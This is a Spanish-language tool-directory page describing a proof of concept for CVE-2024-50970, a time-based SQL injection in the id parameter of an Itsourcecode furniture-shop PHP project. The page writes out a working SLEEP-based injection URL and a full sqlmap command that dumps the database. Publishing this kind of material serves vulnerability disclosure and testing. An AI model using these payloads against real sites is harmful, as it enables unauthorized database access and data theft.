Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/akhlak2511/cve-2024-50970
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónSeguridad de Bases de Datos
GitHubakhlak2511/cve-2024-50970

CVE-2024-50970

Prueba de concepto que demuestra inyección SQL basada en tiempo en Itsourcecode Online Furniture Shopping Project 1.0 a través del parámetro id en orderview1.php, incluyendo pasos de explotación y comandos de SQLMap.

Ver Repositorio
4hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-50970

Descripción

Una vulnerabilidad de inyección SQL en orderview1.php de Itsourcecode Online Furniture Shopping Project 1.0 permite a atacantes remotos ejecutar comandos SQL arbitrarios a través del parámetro id.

Tipo de Vulnerabilidad

Inyección SQL

Proveedor del Producto

Itsourcecode

Base de Código del Producto Afectado:

https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ - 1.0

Componente Afectado:

El Itsourcecode Online Furniture Shopping v1.0 es vulnerable a inyección SQL a través del parámetro id en la página orderview1.php

Vectores de Ataque:

  1. Configure la aplicación localmente, registre una cuenta e inicie sesión con la cuenta recién registrada.
  • Navegue a la siguiente URL en su navegador: http://localhost/nikos/orderview1.php?action=edit&id=1728835149
  • Inyecte la carga útil SQL: Modifique el parámetro id en la URL para incluir una carga útil de inyección SQL basada en tiempo. http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
  • Observe la respuesta de la aplicación: La página debería tardar notablemente más (10 segundos) en cargarse si la inyección tiene éxito, confirmando que el parámetro id es vulnerable a inyección SQL.
  • Ahora use la herramienta SQLMap para una mayor explotación y volcado de bases de datos usando el siguiente comando: python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast
  • Referencia:

    1. https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
    2. https://owasp.org/www-community/attacks/SQL_Injection
    Descargar herramienta